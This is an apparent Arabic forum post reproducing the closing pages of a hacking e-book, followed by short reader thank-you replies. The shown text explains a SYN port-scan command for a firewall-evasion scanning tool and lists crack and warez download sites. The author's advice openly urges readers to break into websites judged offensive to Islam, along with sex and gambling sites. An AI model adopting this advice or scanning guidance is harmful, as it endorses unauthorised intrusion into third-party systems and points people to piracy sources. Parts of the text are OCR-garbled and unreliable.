اا قريبه من ااداة tcp and fin بمعنى اصح كمااا تقوم بعدة عمليات مسح من ظمنها وكما ذي الاداه لا يتم تسجيل أي شي يخصك في ملفات and syn اللوق او وندوز xp العيوب : من عيوب هذه الاداه اا لا تعمل إلي في وندوز ٢٠٠٠ طريقة التشغيل : يعني تضعها في السي ثم تدخل netcat طريقة التشغيل مشاه لي اداة عليها من خلال الدوس ا الاوامر او طريقة التشغيل : طريقة التشغيل لهذه الاداه سهله جدا سوف نجري عملية مسح لي ايبي وهمي ٨٦ ( لي الرقم ( ١٢٧,٠,٠,١ Ipeye ١٢٧,٠,٠________________,١ –syn –p ٢٠ ٨٠ يستخدم لي اختراق الجدران الناريه وكما قمنا بتحديد مجال syn طبع الامر ابحث من ٢٠ إلي ٨٠ واظن هذا الامرالمهم لنا اذا اردنا فحص اي نظام مع تحيات / صانع السلالم ٨٧ بسم الله الرحمن الرحيم هذا الجزء من الكتاب سأقوم بتسميته ~ّ~ دليل المواقع~~ سأعرض افضل المواقع وسنبدأ بالتسلسل اولا مواقع الامن والحمايه وهذه اشهر وافضل مواقع السكيورتى SecuriTeam.com -١ SecurityFocus -٢ http://ntsecurity.com-٣ Insecure.Org - Nmap Free Security Scanner, Tools & Hacking resources -٤ http://root****l.redi.tk -٥ -------------------------------------- تقريبا هذه افضل مواقع السكيورتى والخاصه بأمن الثغرات وآخر اخبارها --------------------------------------- وهنا قائمه افضل مواقع الكراكات ومحركات بحثها اول موقع اعتبره ملك محركات البحث والذي يحتوى على الكثير والكثير دليل المواقع ٨٨ هذا الموقع اتمنى ان تضعه مساعدك الاول في جميع ماتحتاجه من مواقع سكيورتى ومواقع كراكات واخر صيحات الاكسبلويتات واخر الادوات واصداراته والبرامج وغيره وغيره موقع قوقل هو ملك محركات البحث والاول في عالمه Google -٦ وهذه بقيه مواقع الكراكات ومحركات بحثها warezarchive.org -٧ /http://www.crack-site.com -٨ /http://cracks.thebugs.us -٩ /http://www.crackheaven.com -١٠ http://www.jtoonen.xs٤all.nl -١١ LinkWorld: Best Links /ch_Engines -١٢ LinkWorld: Best Links -١٣ logo pens mugs printed pen at scdown.org -١٤ /http://www.andr.net -١٥ وهذه اعتبره افضل واشهر منتديات ومواقع الكراكرز ٨٩ لن تكون هذه اية الكتاب وسيصدر له نسخه ثانيه عما قريب ولقد قمت بطمس اكثر من ٢٢ موضوع ونقله من هذه الجزء الى الجزء الثاني كي تكون متساويان وثانيا لم اقوم باضافة دروسي المنتشره بالمواقع ومكتبات الهاكينغ بالانترنت الى هذا الكتاب ولم اضيف الا درسين فقط وهم اختراق الانظمة ورياضيات الاف تي بي وثالثا لم اضيف جميع دروسي التى طرحتها بمنظمة هاكرز بلا حدود هنا وهذا ليساعدنى في طرح النسخه الاحترافي لكتاب القرصنة تحت اهر وهي التى ستختم دروسي السابقه والجديده في عالم الهاكينغ وستصدر هذه النهاية ٩٠ النسخه بعد مايتم طرح نسخه القرصنة تحت اهر الاصدار الثاني ولن تكون مجانيه لما تحتويه من مواضيع خطيره اما من ناحية جديد اخوكم سوبر كريستال هو كتاب المخترقين العرب وكتاب الآمن والحماية وسيتم طرحهن بعد فتره ليست بطويله نصيحة جميع اخوانى الاساتذه في مجال الهاكينغ يحذرون دائما من اختراق المواقع العربية وانا اختلف معهم في هذه النقطه وليس فقط المواقع العربية التى لانقوم باختراقها حتى المواقع الاجنبيه لاتقوم بأختراقها اذا لم يكن لها ضرر لك او للدين والاسلام او حتى الوطن فلأضرب لك مثال اذكر بعض المخترقين العرب الذين يدعون الخبره يقومون باختراق مواقع ليس لها دخل بالاسلام او بغيره ٩١ فاذكر شخص لن اذكر اسمه هنا قام بأختراق موقع اكادميه والآخر قام باختراق موقع جامعة !!! هل تعتبر هذا هو الصواب ؟؟؟ اذا كان نعم فانا اندم على انزال دروس لك جميعها مواقع ليس لها دخل بالاسلام بالعكس هي مواقع عادى ومفيده ايضا والمفروض نقوم بتحسين صورة الاسلام للعالم كلل وليس تغيير صورة الاسلام فااذكر لك قصه شخص عزيز علي شخصيَا ولن اذكر اسمه هنا حتى لانشر اختراقة او ماشببه ولو كان شخص آخر من mp قام المبدع باختراق الموقع الشهير ٣ المخترقين الموجودين حاليَا بالمنتديات أقل شئ يفعله هو رفع شعاره وتدمير الموقع ونشر اختراقه بالمواقع العربية وحتى بالصحف والات كااخواانا المتخلفين الذين يدعون ام مخترقين المبدع العبقري لم يقوم بتدمير الموقع فقط كل مافعله هو نسخ الاكسبلويت وارساله للموقع برسالة تحذير تتوقع ماذا كانت ردت فعلهم؟؟ هل هي مثل المواقع العربية اذا حذرناهم عن ثغره بموقعهم قاموا باسب والشتم ؟؟ بالعكس ردوا عليه بالشكر وتغيرت صورة الاسلام ككل حولهم فحكومتهم تزرع الحقد في عقولهم ويدعون ان الاسلام هو الارهاب ولكن مجرد شئ بسيط اختراق وتحذيرهم غير صورة آمة كاملة ٩٢ فلماذا لاتقوم بتحسين صورة الاسلام عزيزي القارئ بشتى مواقع الانترنت اما من ناحية اخرى وهي المواقع التى انصحك باختراقها اولها المواقع التى تسيئ للاسلام والدين والمواقع الجنسية ومواقع القمار وغيره من مواقع المراهقين ولو اننى بنفسي لم اقوم في حياتى باختراق موقع جنسي او غيره للاننى في الواقع لاادخل هذه المواقع حتى اقوم بااختراق او الوقوف خلف صفحاا ساعات كي ابحث عن ثغرة تمكني من اختراقها واتمنى لك اختراق سعيد وان تستغل موهبتك في شئ يفيدك مثل الحماية وعلم الانظمة وغيره من هذه االات والابتعاد عن الاختراق في اشياء لاتفيدك بل تسبب لك اضرار لك ولعائلتك ...الخ مع اطيب تحية وتمنياتى للجميع بالتوفيق SUPER-CRYSTAL ooloo٦٠٥@hotmail.com ٩٣ انتهى،،،__
مشكوووووووورررررررررررررر ررر
طلبت من القلم إنه يرسمك. . .رد بكل خجل ما أقدر أخدمك ! سألته ويش السبب ؟قال أنا أعرف أرسم : شجرأرسم : قمرأرسم : زهرأرسم : نهرأرسم : غيمة مطرلكن . !ما أعرف أرسم ملاك على هيئه بشر . . ؟
thnnnnnnnnnnnnnnnnnks
wwwwwwwwwwwaaaaaaaaaaaaaaaawwwwwwwwwwwwwww مشكووووووووووور
شكر للجميع
مابين عندي رابط تحميل الكتاب ما عم يزبط معي شي ليه ؟
thankssss tnankkkkkss
تسلم على الكتاب ... تحياتي يا بوس
تسلم أخوي على الشرح المميز ^^
merci mais ou est le lien???????????
قوانين المنتدى